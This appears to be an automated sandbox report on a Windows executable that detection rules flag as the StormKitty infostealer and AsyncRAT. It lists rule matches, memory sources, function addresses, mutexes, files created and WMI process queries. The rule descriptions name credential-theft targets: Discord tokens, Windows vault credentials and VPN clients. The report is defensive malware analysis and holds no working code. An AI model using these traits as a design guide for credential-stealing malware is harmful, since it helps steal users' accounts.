Source: 0.2.FUEvp5c8lO.exe.4843f68.0.unpack, type: UNPACKEDPE	Matched rule: Finds StormKitty samples (or their variants) based on specific strings Author: Sekoia.io
Source: 0.2.FUEvp5c8lO.exe.4843f68.0.unpack, type: UNPACKEDPE	Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
Source: 0.2.FUEvp5c8lO.exe.4843f68.0.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 0.2.FUEvp5c8lO.exe.4843f68.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 0.2.FUEvp5c8lO.exe.4843f68.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: 0.2.FUEvp5c8lO.exe.4843f68.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.FUEvp5c8lO.exe.4843f68.0.unpack, type: UNPACKEDPE	Matched rule: Detects StormKitty infostealer Author: ditekSHen
Source: 0.2.FUEvp5c8lO.exe.4843f68.0.raw.unpack, type: UNPACKEDPE	Matched rule: Finds StormKitty samples (or their variants) based on specific strings Author: Sekoia.io
Source: 0.2.FUEvp5c8lO.exe.4843f68.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
Source: 0.2.FUEvp5c8lO.exe.4843f68.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 0.2.FUEvp5c8lO.exe.4843f68.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 0.2.FUEvp5c8lO.exe.4843f68.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: 0.2.FUEvp5c8lO.exe.4843f68.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.FUEvp5c8lO.exe.4843f68.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects StormKitty infostealer Author: ditekSHen
Source: 0.2.FUEvp5c8lO.exe.4818348.1.raw.unpack, type: UNPACKEDPE	Matched rule: Finds StormKitty samples (or their variants) based on specific strings Author: Sekoia.io
Source: 0.2.FUEvp5c8lO.exe.4818348.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
Source: 0.2.FUEvp5c8lO.exe.4818348.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 0.2.FUEvp5c8lO.exe.4818348.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 0.2.FUEvp5c8lO.exe.4818348.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: 0.2.FUEvp5c8lO.exe.4818348.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.FUEvp5c8lO.exe.4818348.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects StormKitty infostealer Author: ditekSHen
Source: 00000003.00000002.2622715180.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 00000003.00000002.2622715180.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 00000003.00000002.2624958083.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 00000000.00000002.1419660864.0000000004644000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: Process Memory Space: FUEvp5c8lO.exe PID: 7920, type: MEMORYSTR	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: Process Memory Space: FUEvp5c8lO.exe PID: 7920, type: MEMORYSTR	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: Process Memory Space: FUEvp5c8lO.exe PID: 8116, type: MEMORYSTR	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: Process Memory Space: FUEvp5c8lO.exe PID: 8116, type: MEMORYSTR	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen

Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Code function: 0_2_02D0D404	0_2_02D0D404
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Code function: 0_2_07377D98	0_2_07377D98
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Code function: 0_2_07375C98	0_2_07375C98
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Code function: 0_2_07373F20	0_2_07373F20
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Code function: 0_2_07372D30	0_2_07372D30
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Code function: 0_2_073714F0	0_2_073714F0
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Code function: 0_2_073714D0	0_2_073714D0
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Code function: 0_2_07371928	0_2_07371928
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Code function: 0_2_07371918	0_2_07371918
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Code function: 0_2_07381E7B	0_2_07381E7B
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Code function: 0_2_073896C8	0_2_073896C8
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Code function: 0_2_07382CF8	0_2_07382CF8
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Code function: 0_2_07380B90	0_2_07380B90
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Code function: 0_2_073880A0	0_2_073880A0
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Code function: 0_2_07384F10	0_2_07384F10
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Code function: 0_2_07384F00	0_2_07384F00
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Code function: 0_2_07389FBB	0_2_07389FBB
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Code function: 0_2_07389FC8	0_2_07389FC8
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Code function: 0_2_07388E40	0_2_07388E40
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Code function: 0_2_07388698	0_2_07388698
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Code function: 0_2_07388688	0_2_07388688
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Code function: 0_2_073896C6	0_2_073896C6
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Code function: 0_2_07383D08	0_2_07383D08
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Code function: 0_2_0738557B	0_2_0738557B
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Code function: 0_2_0738A570	0_2_0738A570
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Code function: 0_2_0738A560	0_2_0738A560
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Code function: 0_2_07385588	0_2_07385588
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Code function: 0_2_07381440	0_2_07381440
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Code function: 0_2_07382CAF	0_2_07382CAF
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Code function: 0_2_07382C97	0_2_07382C97
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Code function: 0_2_07383CF8	0_2_07383CF8
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Code function: 0_2_07380B3D	0_2_07380B3D
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Code function: 0_2_07383B10	0_2_07383B10
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Code function: 0_2_07380B77	0_2_07380B77
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Code function: 0_2_07388358	0_2_07388358
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Code function: 0_2_07388348	0_2_07388348
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Code function: 0_2_073853A8	0_2_073853A8
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Code function: 0_2_07385398	0_2_07385398
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Code function: 0_2_07388A90	0_2_07388A90
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Code function: 0_2_07388A80	0_2_07388A80
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Code function: 0_2_07385118	0_2_07385118
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Code function: 0_2_07385108	0_2_07385108
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Code function: 0_2_0738001F	0_2_0738001F
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Code function: 0_2_07380040	0_2_07380040
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Code function: 0_2_073848B8	0_2_073848B8
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Code function: 0_2_07388090	0_2_07388090
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Code function: 0_2_073818D9	0_2_073818D9
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Code function: 3_2_01126390	3_2_01126390
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Code function: 3_2_01125AC0	3_2_01125AC0
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Code function: 3_2_01129750	3_2_01129750
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Code function: 3_2_01125778	3_2_01125778
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Code function: 3_2_01129760	3_2_01129760
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Code function: 3_2_053B05FF	3_2_053B05FF
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Code function: 3_2_053B0600	3_2_053B0600
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Code function: 3_2_053BC108	3_2_053BC108
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Code function: 3_2_053BC0F7	3_2_053BC0F7
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Code function: 3_2_053B5D60	3_2_053B5D60
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Code function: 3_2_053B5D52	3_2_053B5D52

Source: FUEvp5c8lO.exe, 00000000.00000002.1417764484.0000000000FBE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs FUEvp5c8lO.exe
Source: FUEvp5c8lO.exe, 00000000.00000002.1421582289.0000000006FE0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameArthur.dll" vs FUEvp5c8lO.exe
Source: FUEvp5c8lO.exe, 00000000.00000002.1419108243.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameClient.exe. vs FUEvp5c8lO.exe
Source: FUEvp5c8lO.exe, 00000000.00000002.1419660864.0000000004644000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameClient.exe. vs FUEvp5c8lO.exe
Source: FUEvp5c8lO.exe, 00000000.00000002.1419660864.0000000004644000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs FUEvp5c8lO.exe
Source: FUEvp5c8lO.exe, 00000000.00000002.1422436227.000000000A5A0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs FUEvp5c8lO.exe
Source: FUEvp5c8lO.exe, 00000000.00000000.1353581939.0000000000922000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameCjnw.exe, vs FUEvp5c8lO.exe
Source: FUEvp5c8lO.exe, 00000003.00000002.2622715180.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameClient.exe. vs FUEvp5c8lO.exe
Source: FUEvp5c8lO.exe	Binary or memory string: OriginalFilenameCjnw.exe, vs FUEvp5c8lO.exe

Source: FUEvp5c8lO.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.2.FUEvp5c8lO.exe.4818348.1.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_stormkitty author = Sekoia.io, description = Finds StormKitty samples (or their variants) based on specific strings, creation_date = 2023-03-29, classification = TLP:CLEAR, version = 1.0, id = 5014d2e5-af5c-4800-ab1e-b57de37a2450
Source: 0.2.FUEvp5c8lO.exe.4818348.1.unpack, type: UNPACKEDPE	Matched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
Source: 0.2.FUEvp5c8lO.exe.4818348.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 0.2.FUEvp5c8lO.exe.4818348.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 0.2.FUEvp5c8lO.exe.4818348.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: 0.2.FUEvp5c8lO.exe.4818348.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.FUEvp5c8lO.exe.4818348.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
Source: 3.2.FUEvp5c8lO.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_stormkitty author = Sekoia.io, description = Finds StormKitty samples (or their variants) based on specific strings, creation_date = 2023-03-29, classification = TLP:CLEAR, version = 1.0, id = 5014d2e5-af5c-4800-ab1e-b57de37a2450
Source: 3.2.FUEvp5c8lO.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
Source: 3.2.FUEvp5c8lO.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 3.2.FUEvp5c8lO.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 3.2.FUEvp5c8lO.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: 3.2.FUEvp5c8lO.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 3.2.FUEvp5c8lO.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
Source: 0.2.FUEvp5c8lO.exe.4843f68.0.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_stormkitty author = Sekoia.io, description = Finds StormKitty samples (or their variants) based on specific strings, creation_date = 2023-03-29, classification = TLP:CLEAR, version = 1.0, id = 5014d2e5-af5c-4800-ab1e-b57de37a2450
Source: 0.2.FUEvp5c8lO.exe.4843f68.0.unpack, type: UNPACKEDPE	Matched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
Source: 0.2.FUEvp5c8lO.exe.4843f68.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 0.2.FUEvp5c8lO.exe.4843f68.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 0.2.FUEvp5c8lO.exe.4843f68.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: 0.2.FUEvp5c8lO.exe.4843f68.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.FUEvp5c8lO.exe.4843f68.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
Source: 0.2.FUEvp5c8lO.exe.4843f68.0.raw.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_stormkitty author = Sekoia.io, description = Finds StormKitty samples (or their variants) based on specific strings, creation_date = 2023-03-29, classification = TLP:CLEAR, version = 1.0, id = 5014d2e5-af5c-4800-ab1e-b57de37a2450
Source: 0.2.FUEvp5c8lO.exe.4843f68.0.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
Source: 0.2.FUEvp5c8lO.exe.4843f68.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 0.2.FUEvp5c8lO.exe.4843f68.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 0.2.FUEvp5c8lO.exe.4843f68.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: 0.2.FUEvp5c8lO.exe.4843f68.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.FUEvp5c8lO.exe.4843f68.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
Source: 0.2.FUEvp5c8lO.exe.4818348.1.raw.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_stormkitty author = Sekoia.io, description = Finds StormKitty samples (or their variants) based on specific strings, creation_date = 2023-03-29, classification = TLP:CLEAR, version = 1.0, id = 5014d2e5-af5c-4800-ab1e-b57de37a2450
Source: 0.2.FUEvp5c8lO.exe.4818348.1.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
Source: 0.2.FUEvp5c8lO.exe.4818348.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 0.2.FUEvp5c8lO.exe.4818348.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 0.2.FUEvp5c8lO.exe.4818348.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: 0.2.FUEvp5c8lO.exe.4818348.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.FUEvp5c8lO.exe.4818348.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
Source: 00000003.00000002.2622715180.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 00000003.00000002.2622715180.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 00000003.00000002.2624958083.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 00000000.00000002.1419660864.0000000004644000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: Process Memory Space: FUEvp5c8lO.exe PID: 7920, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: Process Memory Space: FUEvp5c8lO.exe PID: 7920, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: Process Memory Space: FUEvp5c8lO.exe PID: 8116, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: Process Memory Space: FUEvp5c8lO.exe PID: 8116, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions

Source: FUEvp5c8lO.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@19/140@4/4

Source: C:\Users\user\Desktop\FUEvp5c8lO.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\FUEvp5c8lO.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7000:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2156:120:WilError_03
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Mutant created: \Sessions\1\BaseNamedObjects\KGSXGZfaUDvZVGJ

Source: C:\Users\user\Desktop\FUEvp5c8lO.exe

File created: C:\Users\user\AppData\Local\Temp\tmp3737.tmp

Jump to behavior

Source: FUEvp5c8lO.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: FUEvp5c8lO.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
